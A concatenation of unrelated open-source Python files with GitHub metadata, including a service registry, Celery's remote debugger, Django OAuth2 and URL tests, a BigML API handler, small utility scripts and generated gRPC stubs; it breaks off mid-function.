protocol = self._client_protocols[node]
protocol.send(packet)
def get_service_instances(self, packet, registry_protocol):
params = packet['params']
service, version = params['service'], params['version']
instances = self._repository.get_consumers(service, version)
instance_packet = ControlPacket.send_instances(service, version, instances)
registry_protocol.send(instance_packet)
def get_subscribers(self, packet, protocol):
params = packet['params']
request_id = packet['request_id']
service, version, endpoint = params['service'], params['version'], params['endpoint']
subscribers = self._repository.get_subscribers(service, version, endpoint)
packet = ControlPacket.subscribers(service, version, endpoint, request_id, subscribers)
protocol.send(packet)
def on_timeout(self, node_id):
self.deregister_service(node_id)
def _ping(self, packet):
pinger = self._pingers[packet['node_id']]
pinger.pong_received()
def _pong(self, packet, protocol):
protocol.send(ControlPacket.pong(packet['node_id']))
def _xsubscribe(self, packet):
params = packet['params']
service, version, host, port, node_id = params['service'], params['version'], params['host'], params['port'], params['node_id']
endpoints = params['events']
self._repository.xsubscribe(service, version, host, port, node_id, endpoints)
if __name__ == '__main__':
config_logs(enable_ping_logs=True, log_level=logging.DEBUG)
from setproctitle import setproctitle
setproctitle("registry")
REGISTRY_HOST = None
REGISTRY_PORT = 4500
registry = Registry(REGISTRY_HOST, REGISTRY_PORT, Repository())
registry.start()
| {
"content_hash": "f0df09b9da58beb8ac9eef6f566caa60",
"timestamp": "",
"source": "github",
"line_count": 252,
"max_line_length": 136,
"avg_line_length": 45.46825396825397,
"alnum_prop": 0.6356257636585791,
"repo_name": "pankajnits/vyked",
"id": "733215238ec567d4d2cae2082f09678f6ab2952d",
"size": "11458",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vyked/registry.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "81387"
}
],
"symlink_target": ""
} |
"""Remote Debugger.
Introduction
============
This is a remote debugger for Celery tasks running in multiprocessing
pool workers. Inspired by a lost post on dzone.com.
Usage
-----
.. code-block:: python
from celery.contrib import rdb
from celery import task
@task()
def add(x, y):
result = x + y
rdb.set_trace()
return result
Environment Variables
=====================
.. envvar:: CELERY_RDB_HOST
``CELERY_RDB_HOST``
-------------------
Hostname to bind to. Default is '127.0.01' (only accessable from
localhost).
.. envvar:: CELERY_RDB_PORT
``CELERY_RDB_PORT``
-------------------
Base port to bind to. Default is 6899.
The debugger will try to find an available port starting from the
base port. The selected port will be logged by the worker.
"""
from __future__ import absolute_import, print_function, unicode_literals
import errno
import os
import socket
import sys
from pdb import Pdb
from billiard.process import current_process
from celery.five import range
__all__ = (
'CELERY_RDB_HOST', 'CELERY_RDB_PORT', 'DEFAULT_PORT',
'Rdb', 'debugger', 'set_trace',
)
DEFAULT_PORT = 6899
CELERY_RDB_HOST = os.environ.get('CELERY_RDB_HOST') or '127.0.0.1'
CELERY_RDB_PORT = int(os.environ.get('CELERY_RDB_PORT') or DEFAULT_PORT)
#: Holds the currently active debugger.
_current = [None]
_frame = getattr(sys, '_getframe')
NO_AVAILABLE_PORT = """\
{self.ident}: Couldn't find an available port.
Please specify one using the CELERY_RDB_PORT environment variable.
"""
BANNER = """\
{self.ident}: Ready to connect: telnet {self.host} {self.port}
Type `exit` in session to continue.
{self.ident}: Waiting for client...
"""
SESSION_STARTED = '{self.ident}: Now in session with {self.remote_addr}.'
SESSION_ENDED = '{self.ident}: Session with {self.remote_addr} ended.'
class Rdb(Pdb):
"""Remote debugger."""
me = 'Remote Debugger'
_prev_outs = None
_sock = None
def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT,
port_search_limit=100, port_skew=+0, out=sys.stdout):
self.active = True
self.out = out
self._prev_handles = sys.stdin, sys.stdout
self._sock, this_port = self.get_avail_port(
host, port, port_search_limit, port_skew,
)
self._sock.setblocking(1)
self._sock.listen(1)
self.ident = '{0}:{1}'.format(self.me, this_port)
self.host = host
self.port = this_port
self.say(BANNER.format(self=self))
self._client, address = self._sock.accept()
self._client.setblocking(1)
self.remote_addr = ':'.join(str(v) for v in address)
self.say(SESSION_STARTED.format(self=self))
self._handle = sys.stdin = sys.stdout = self._client.makefile('rw')
Pdb.__init__(self, completekey='tab',
stdin=self._handle, stdout=self._handle)
def get_avail_port(self, host, port, search_limit=100, skew=+0):
try:
_, skew = current_process().name.split('-')
skew = int(skew)
except ValueError:
pass
this_port = None
for i in range(search_limit):
_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
this_port = port + skew + i
try:
_sock.bind((host, this_port))
except socket.error as exc:
if exc.errno in [errno.EADDRINUSE, errno.EINVAL]:
continue
raise
else:
return _sock, this_port
else:
raise Exception(NO_AVAILABLE_PORT.format(self=self))
def say(self, m):
print(m, file=self.out)
def __enter__(self):
return self
def __exit__(self, *exc_info):
self._close_session()
def _close_session(self):
self.stdin, self.stdout = sys.stdin, sys.stdout = self._prev_handles
if self.active:
if self._handle is not None:
self._handle.close()
if self._client is not None:
self._client.close()
if self._sock is not None:
self._sock.close()
self.active = False
self.say(SESSION_ENDED.format(self=self))
def do_continue(self, arg):
self._close_session()
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_quit(self, arg):
self._close_session()
self.set_quit()
return 1
do_q = do_exit = do_quit
def set_quit(self):
# this raises a BdbQuit exception that we're unable to catch.
sys.settrace(None)
def debugger():
"""Return the current debugger instance, or create if none."""
rdb = _current[0]
if rdb is None or not rdb.active:
rdb = _current[0] = Rdb()
return rdb
def set_trace(frame=None):
"""Set break-point at current location, or a specified frame."""
if frame is None:
frame = _frame().f_back
return debugger().set_trace(frame)
| {
"content_hash": "4ecb473ebbc0742723baea826836c0fd",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 76,
"avg_line_length": 26.78125,
"alnum_prop": 0.5902372617658499,
"repo_name": "cloudera/hue",
"id": "019455000ef4eb4303007817e5c8eacd50f2d3e3",
"size": "5166",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/celery-4.2.1/celery/contrib/rdb.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "2347"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "BASIC",
"bytes": "2884"
},
{
"name": "Batchfile",
"bytes": "143575"
},
{
"name": "C",
"bytes": "5129166"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "718011"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "680715"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "Closure Templates",
"bytes": "1072"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "Cython",
"bytes": "1016963"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "13576"
},
{
"name": "EJS",
"bytes": "752"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GAP",
"bytes": "29873"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "641"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "28328425"
},
{
"name": "Haml",
"bytes": "920"
},
{
"name": "Handlebars",
"bytes": "173"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "Java",
"bytes": "457398"
},
{
"name": "JavaScript",
"bytes": "39181239"
},
{
"name": "Jinja",
"bytes": "356"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Less",
"bytes": "396102"
},
{
"name": "Lex",
"bytes": "218764"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1751"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "1025937"
},
{
"name": "Mako",
"bytes": "3644004"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "29403"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "84273"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "6235"
},
{
"name": "Procfile",
"bytes": "47"
},
{
"name": "Pug",
"bytes": "584"
},
{
"name": "Python",
"bytes": "92881549"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "484108"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "SCSS",
"bytes": "78508"
},
{
"name": "Sass",
"bytes": "770"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "249165"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "SourcePawn",
"bytes": "948"
},
{
"name": "Stylus",
"bytes": "682"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "341963"
},
{
"name": "Twig",
"bytes": "761"
},
{
"name": "TypeScript",
"bytes": "1241396"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "Vue",
"bytes": "350385"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "522199"
},
{
"name": "Yacc",
"bytes": "1070437"
},
{
"name": "jq",
"bytes": "4"
}
],
"symlink_target": ""
} |
try:
from django.urls import reverse, NoReverseMatch
except ImportError:
from django.core.urlresolvers import reverse, NoReverseMatch
from django.test.utils import override_settings
from testcases import TestCaseWithFixture
@override_settings(ROOT_URLCONF='namespaced.api.urls')
class NamespacedViewsTestCase(TestCaseWithFixture):
def test_urls(self):
from namespaced.api.urls import api
patterns = api.urls
self.assertEqual(len(patterns), 3)
self.assertEqual(sorted([pattern.name for pattern in patterns if hasattr(pattern, 'name')]), ['api_v1_top_level'])
self.assertEqual([[pattern.name for pattern in include.url_patterns if hasattr(pattern, 'name')] for include in patterns if hasattr(include, 'reverse_dict')], [['api_dispatch_list', 'api_get_schema', 'api_get_multiple', 'api_dispatch_detail'], ['api_dispatch_list', 'api_get_schema', 'api_get_multiple', 'api_dispatch_detail']])
self.assertRaises(NoReverseMatch, reverse, 'api_v1_top_level')
self.assertRaises(NoReverseMatch, reverse, 'special:api_v1_top_level')
self.assertEquals(reverse('special:api_v1_top_level', kwargs={'api_name': 'v1'}), '/api/v1/')
self.assertEquals(reverse('special:api_dispatch_list', kwargs={'api_name': 'v1', 'resource_name': 'notes'}), '/api/v1/notes/')
| {
"content_hash": "fcb00336f8aa477690f5e0c8aca5c655",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 336,
"avg_line_length": 60.45454545454545,
"alnum_prop": 0.7157894736842105,
"repo_name": "beedesk/django-tastypie",
"id": "69f92074b87a05a86d79e29c0d4f48b4b4fe490b",
"size": "1330",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "tests/namespaced/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "988"
},
{
"name": "Python",
"bytes": "804357"
},
{
"name": "Shell",
"bytes": "1162"
}
],
"symlink_target": ""
} |
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.sites.shortcuts import get_current_site
from django.core import mail
from django.urls import reverse
from django.http import HttpResponseRedirect
from django.test import TransactionTestCase
from caffeine_oauth2.models import CoffeestatsApplication
from caffeine_oauth2.views import CoffeestatsApplicationRegistration
User = get_user_model()
class CoffeestatsApplicationRegistrationTest(TransactionTestCase):
def test_get_form_class(self):
view = CoffeestatsApplicationRegistration()
form_class = view.get_form_class()
self.assertIsNotNone(form_class)
self.assertEqual(form_class.Meta.model, CoffeestatsApplication)
def setUp(self):
self.user = User.objects.create_user(
'tester', 'tester@example.org', timezone='Europe/Berlin',
is_active=True)
self.post_data = {
'agree': True, 'website': 'http://foo.example.org/',
'client_type': CoffeestatsApplication.CLIENT_PUBLIC,
'name': 'The foo coffeestats API client',
'description': 'A foo client from the knights of foo',
'client_id': 'test_id',
'authorization_grant_type': CoffeestatsApplication.GRANT_IMPLICIT,
'redirect_uris': 'http://localhost:8001/',
}
self.client.force_login(self.user)
def test_register_application_template(self):
response = self.client.get(reverse('oauth2_provider:register'))
self.assertTemplateUsed(
response, 'oauth2_provider/application_registration_form.html')
def test_valid_application_redirect(self):
response = self.client.post(
reverse('oauth2_provider:register'), data=self.post_data)
# check that the response is a redirect to the pending application
# page
self.assertIsNotNone(response)
self.assertIn('application', response.context)
self.assertIsInstance(response, HttpResponseRedirect)
self.assertEqual(response.url, reverse(
'oauth2_provider:detail',
kwargs={'pk': response.context['application'].id}))
def test_valid_application_use_pending_template(self):
response = self.client.post(
reverse('oauth2_provider:register'), data=self.post_data,
follow=True)
self.assertIsNotNone(response)
self.assertTemplateUsed('caffeine_oauth2/pending_approval.html')
def test_valid_application_email_to_staff(self):
response = self.client.post(
reverse('oauth2_provider:register'), data=self.post_data)
self.assertEqual(len(mail.outbox), 1)
mail_item = mail.outbox[0]
current_site = get_current_site(response.request)
application = response.context['application']
approval_url = reverse('oauth2_provider:approve',
kwargs={'pk': application.id})
self.assertEqual(
mail_item.subject,
'[{}] A new API client {} has been requested'.format(
current_site.name, application.name
))
self.assertEqual(len(mail_item.alternatives), 1)
self.assertEqual(mail_item.alternatives[0][1], 'text/html')
text_content = str(mail_item.body)
html_content = str(mail_item.alternatives[0][0])
for content in (application.name, application.description,
str(self.user), application.website, approval_url):
self.assertIn(content, text_content)
self.assertIn(content, html_content)
self.assertEqual(mail_item.from_email, settings.DEFAULT_FROM_EMAIL)
self.assertEqual(len(mail_item.to), len(settings.ADMINS))
for recipient in [admin[1] for admin in settings.ADMINS]:
self.assertIn(recipient, mail_item.to)
class CoffeestatsApplicationApprovalTest(TransactionTestCase):
def setUp(self):
self.appuser = User.objects.create_user(
'appuser', 'appuser@example.org')
self.application = CoffeestatsApplication.objects.create(
user=self.appuser, agree=False, website='http://foo.example.org/',
client_type=CoffeestatsApplication.CLIENT_PUBLIC,
name='The foo coffeestats API client',
description='A foo client from the knights of foo',
authorization_grant_type=CoffeestatsApplication.GRANT_IMPLICIT,
redirect_uris='http://localhost:8001/'
)
self.post_data = {
'name': 'The foo API client',
'description': 'Third party foo client from the knights of foo',
'website': self.application.website,
'client_type': self.application.client_type,
'authorization_grant_type': CoffeestatsApplication.GRANT_IMPLICIT,
}
self.user = User.objects.create_superuser(
username='admin', email='coffeestats@example.org',
password='s3cr3t', timezone='Europe/Berlin')
self.client.force_login(self.user)
def test_approve_application_template(self):
response = self.client.get(reverse(
'oauth2_provider:approve', kwargs={'pk': self.application.id}))
self.assertTemplateUsed(response, 'caffeine_oauth2/approve.html')
def test_valid_approval_redirect(self):
response = self.client.post(reverse(
'oauth2_provider:approve', kwargs={'pk': self.application.id}),
data=self.post_data)
# check that the response is a redirect to the application list page
self.assertIsNotNone(response)
self.assertIsInstance(response, HttpResponseRedirect)
self.assertEqual(response.url, reverse('oauth2_provider:list_all'))
def test_valid_approval_email_to_applicant(self):
response = self.client.post(reverse(
'oauth2_provider:approve', kwargs={'pk': self.application.id}),
data=self.post_data)
self.assertEqual(len(mail.outbox), 1)
mail_item = mail.outbox[0]
current_site = get_current_site(response.request)
detail_url = reverse('oauth2_provider:detail',
kwargs={'pk': self.application.id})
self.assertEqual(
mail_item.subject,
'[{}] Your API client {} has been approved'.format(
current_site.name, self.post_data['name'],
)
)
self.assertEqual(len(mail_item.alternatives), 1)
self.assertEqual(mail_item.alternatives[0][1], 'text/html')
text_content = str(mail_item.body)
html_content = str(mail_item.alternatives[0][0])
for content in (detail_url, self.post_data['name']):
self.assertIn(content, text_content)
self.assertIn(content, html_content)
self.assertEqual(mail_item.from_email, settings.DEFAULT_FROM_EMAIL)
self.assertEqual(len(mail_item.to), 1)
self.assertIn(self.appuser.email, mail_item.to)
class CoffeestatsApplicationRejectionTest(TransactionTestCase):
def setUp(self):
self.appuser = User.objects.create_user(
'appuser', 'appuser@example.org')
self.application = CoffeestatsApplication.objects.create(
user=self.appuser, agree=False, website='http://foo.example.org/',
client_type=CoffeestatsApplication.CLIENT_PUBLIC,
name='The foo coffeestats API client',
description='A foo client from the knights of foo',
authorization_grant_type=CoffeestatsApplication.GRANT_IMPLICIT,
redirect_uris='http://localhost:8001/'
)
self.post_data = {
'reasoning': 'It sucks! Really this is not a good idea.',
}
self.user = User.objects.create_superuser(
username='admin', email='coffeestats@example.org',
password='s3cr3t', timezone='Europe/Berlin')
self.client.force_login(self.user)
def test_approve_application_template(self):
response = self.client.get(reverse(
'oauth2_provider:reject', kwargs={'pk': self.application.id}))
self.assertTemplateUsed(response, 'caffeine_oauth2/reject.html')
def test_valid_reject_redirect(self):
response = self.client.post(reverse(
'oauth2_provider:reject', kwargs={'pk': self.application.id}),
data=self.post_data)
self.assertIsNotNone(response)
self.assertIsInstance(response, HttpResponseRedirect)
self.assertEqual(response.url, reverse('oauth2_provider:list_all'))
def test_valid_reject_email_to_applicant(self):
response = self.client.post(reverse(
'oauth2_provider:reject', kwargs={'pk': self.application.id}),
data=self.post_data)
with self.assertRaises(CoffeestatsApplication.DoesNotExist):
CoffeestatsApplication.objects.get(pk=self.application.id)
self.assertEqual(len(mail.outbox), 1)
mail_item = mail.outbox[0]
current_site = get_current_site(response.request)
self.assertEqual(
mail_item.subject,
'[{}] Your API client {} has been rejected'.format(
current_site.name, self.application.name))
self.assertEqual(len(mail_item.alternatives), 1)
self.assertEqual(mail_item.alternatives[0][1], 'text/html')
text_content = str(mail_item.body)
html_content = str(mail_item.alternatives[0][0])
for content in (self.application.name, self.post_data['reasoning']):
self.assertIn(content, text_content)
self.assertIn(content, html_content)
self.assertEqual(mail_item.from_email, settings.DEFAULT_FROM_EMAIL)
self.assertEqual(len(mail_item.to), 1)
self.assertIn(self.appuser.email, mail_item.to)
| {
"content_hash": "eb74d0f8c17209c42c8664e98fb4cb47",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 78,
"avg_line_length": 47.110047846889955,
"alnum_prop": 0.6478773105829778,
"repo_name": "coffeestats/coffeestats-django",
"id": "51095f02b70bd214520ac9211ae19e5e31018e94",
"size": "9846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "coffeestats/caffeine_oauth2/tests/test_views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "62461"
},
{
"name": "Dockerfile",
"bytes": "881"
},
{
"name": "HTML",
"bytes": "106689"
},
{
"name": "JavaScript",
"bytes": "45668"
},
{
"name": "Python",
"bytes": "279433"
},
{
"name": "Shell",
"bytes": "1210"
}
],
"symlink_target": ""
} |
"""Base class for evaluations' REST calls
https://bigml.com/api/evaluations
"""
try:
import simplejson as json
except ImportError:
import json
from bigml.api_handlers.resourcehandler import ResourceHandlerMixin
from bigml.api_handlers.resourcehandler import check_resource_type, \
get_evaluation_id
from bigml.constants import SUPERVISED_PATHS, TIME_SERIES_PATH, EVALUATION_PATH
class EvaluationHandlerMixin(ResourceHandlerMixin):
"""This class is used by the BigML class as
a mixin that provides the REST calls models. It should not
be instantiated independently.
"""
def __init__(self):
"""Initializes the EvaluationHandler. This class is intended to be
used as a mixin on ResourceHandler, that inherits its
attributes and basic method from BigMLConnection, and must not be
instantiated independently.
"""
self.evaluation_url = self.url + EVALUATION_PATH
def create_evaluation(self, model, dataset,
args=None, wait_time=3, retries=10):
"""Creates a new evaluation.
"""
create_args = {}
if args is not None:
create_args.update(args)
model_types = SUPERVISED_PATHS[:]
model_types.append(TIME_SERIES_PATH)
origin_resources_checked = self.check_origins(
dataset, model, create_args, model_types=model_types,
wait_time=wait_time, retries=retries)
if origin_resources_checked:
body = json.dumps(create_args)
return self._create(self.evaluation_url, body)
return
def get_evaluation(self, evaluation, query_string=''):
"""Retrieves an evaluation.
The evaluation parameter should be a string containing the
evaluation id or the dict returned by create_evaluation.
As evaluation is an evolving object that is processed
until it reaches the FINISHED or FAULTY state, the function will
return a dict that encloses the evaluation values and state info
available at the time it is called.
"""
check_resource_type(evaluation, EVALUATION_PATH,
message="An evaluation id is needed.")
return self.get_resource(evaluation, query_string=query_string)
def list_evaluations(self, query_string=''):
"""Lists all your evaluations.
"""
return self._list(self.evaluation_url, query_string)
def update_evaluation(self, evaluation, changes):
"""Updates an evaluation.
"""
check_resource_type(evaluation, EVALUATION_PATH,
message="An evaluation id is needed.")
return self.update_resource(evaluation, changes)
def delete_evaluation(self, evaluation):
"""Deletes an evaluation.
"""
check_resource_type(evaluation, EVALUATION_PATH,
message="An evaluation id is needed.")
return self.delete_resource(evaluation)
| {
"content_hash": "2eca3fd736ebbb64e4c90f9294da4406",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 79,
"avg_line_length": 34.26966292134831,
"alnum_prop": 0.6426229508196721,
"repo_name": "mmerce/python",
"id": "6974d5aab0c2c2367afb3b3554fa54f22696b920",
"size": "3651",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bigml/api_handlers/evaluationhandler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1531559"
}
],
"symlink_target": ""
} |
import argparse
import os
import subprocess
parser = argparse.ArgumentParser(description="Runs Java integration tests.")
TOOLKIT_ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
def run():
try:
subprocess.check_call("make test_java", cwd=TOOLKIT_ROOT_DIR, shell=True)
except subprocess.CalledProcessError as e:
print "Tests failed, printing out error reports:"
for filename in os.listdir(os.path.join(TOOLKIT_ROOT_DIR, "src/java/target/surefire-reports")):
if filename.startswith("com.dnanexus."):
print open(os.path.join(TOOLKIT_ROOT_DIR, "src/java/target/surefire-reports", filename)).read().strip()
raise e
if __name__ == '__main__':
args = parser.parse_args()
run()
| {
"content_hash": "58e839d2688fd1760e6ba57cfb5b270f",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 119,
"avg_line_length": 37.76190476190476,
"alnum_prop": 0.6708701134930644,
"repo_name": "jhuttner/dx-toolkit",
"id": "bd275cb0d73a1fcd33e2547596dc427f9a4fedef",
"size": "816",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "build/run_java_integration_tests.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3198"
},
{
"name": "C",
"bytes": "6957"
},
{
"name": "C++",
"bytes": "1880260"
},
{
"name": "CMake",
"bytes": "26162"
},
{
"name": "Groovy",
"bytes": "8855"
},
{
"name": "Java",
"bytes": "2177401"
},
{
"name": "Makefile",
"bytes": "50221"
},
{
"name": "NSIS",
"bytes": "17861"
},
{
"name": "Perl",
"bytes": "46855"
},
{
"name": "PowerShell",
"bytes": "1442"
},
{
"name": "Python",
"bytes": "2261586"
},
{
"name": "R",
"bytes": "550095"
},
{
"name": "Ruby",
"bytes": "78045"
},
{
"name": "Shell",
"bytes": "58977"
}
],
"symlink_target": ""
} |
'''Script to combine text by by file names of main three periods: 1848-1900; 1901-1948; 1949-1978'''
from os import walk
import os
from collections import defaultdict
from pprint import pprint
FOLDER = '/Users/deborah/Documents/scripts/python_work/project2016/smelly_london/Full text'
OUTPUT_FOLDER = '/Users/deborah/Documents/scripts/python_work/project2016/smelly_london/Combined text_by_period/'
def create_mapping():
mapping = defaultdict(list)
for (dirpath, dirnames, fileNames) in walk(FOLDER):
for fileName in fileNames:
year = fileName.split('.')[1]
year_bucket = get_year_bucket(year)
if not year_bucket:
continue
mapping[year_bucket].append(fileName)
return mapping
def get_year_bucket(year):
try:
year = int(year)
except:
return None
if year in range(1848, 1901):
return '1848-1900'
if year in range(1901, 1950):
return '1901-1948'
if year in range(1949, 1979):
return '1949-1978'
return year
def concatenate_files(mapping):
for year in mapping.keys():
files = mapping[year]
new_filename = OUTPUT_FOLDER + year + '.txt'
with open(new_filename, 'w') as outfile:
for fname in files:
filePath = FOLDER + '/' + fname
with open(filePath) as infile:
for line in infile:
outfile.write(line)
def main():
mapping = create_mapping()
# pprint(mapping)
concatenate_files(mapping)
if __name__ == "__main__":
main()
| {
"content_hash": "dc81e2d83f160513263648ddf2665d29",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 113,
"avg_line_length": 27.372881355932204,
"alnum_prop": 0.6086687306501548,
"repo_name": "Smelly-London/datavisualisation",
"id": "9fe230c99ff37f1a90f32828dce8a8aaf9a72cb7",
"size": "1615",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "NLTK_textmine/combine_txt_three_periods.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "4133"
},
{
"name": "Python",
"bytes": "1733727"
}
],
"symlink_target": ""
} |
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
import friendship_pb2 as friendship__pb2
class FriendshipStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Create = channel.unary_unary(
'/Friendship/Create',
request_serializer=friendship__pb2.Person.SerializeToString,
response_deserializer=friendship__pb2.CreateResult.FromString,
)
self.ListFriends = channel.unary_stream(
'/Friendship/ListFriends',
request_serializer=friendship__pb2.PersonEmail.SerializeToString,
response_deserializer=friendship__pb2.Person.FromString,
)
self.CommonFriendsCount = channel.stream_unary(
'/Friendship/CommonFriendsCount',
request_serializer=friendship__pb2.PersonEmail.SerializeToString,
response_deserializer=friendship__pb2.CommonFriendsResult.FromString,
)
self.MakeFriends = channel.stream_stream(
'/Friendship/MakeFriends',
request_serializer=friendship__pb2.FriendshipRequest.SerializeToString,
response_deserializer=friendship__pb2.FriendshipResponse.FromString,
)
class FriendshipServicer(object):
"""Missing associated documentation comment in .proto file."""
def Create(self, request, context):
"""returns email (as the id)
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListFriends(self, request, context):
"""lists all friends for a given email
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CommonFriendsCount(self, request_iterator, context):
"""list number of friends for all given emails
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MakeFriends(self, request_iterator, context):
"""associate friends and returns true if friendship created or false if a given Person cannot be found
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_FriendshipServicer_to_server(servicer, server):
rpc_method_handlers = {
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=friendship__pb2.Person.FromString,
response_serializer=friendship__pb2.CreateResult.SerializeToString,
),
'ListFriends': grpc.unary_stream_rpc_method_handler(
servicer.ListFriends,
request_deserializer=friendship__pb2.PersonEmail.FromString,
response_serializer=friendship__pb2.Person.SerializeToString,
),
'CommonFriendsCount': grpc.stream_unary_rpc_method_handler(
servicer.CommonFriendsCount,
request_deserializer=friendship__pb2.PersonEmail.FromString,
response_serializer=friendship__pb2.CommonFriendsResult.SerializeToString,
),
'MakeFriends': grpc.stream_stream_rpc_method_handler(
servicer.MakeFriends,
request_deserializer=friendship__pb2.FriendshipRequest.FromString,
response_serializer=friendship__pb2.FriendshipResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Friendship', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Friendship(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Friendship/Create',
friendship__pb2.Person.SerializeToString,
friendship__pb2.CreateResult.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListFriends(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/Friendship/ListFriends',
friendship__pb2.PersonEmail.SerializeToString,
friendship__pb2.Person.FromString,
options, channel_credentials,
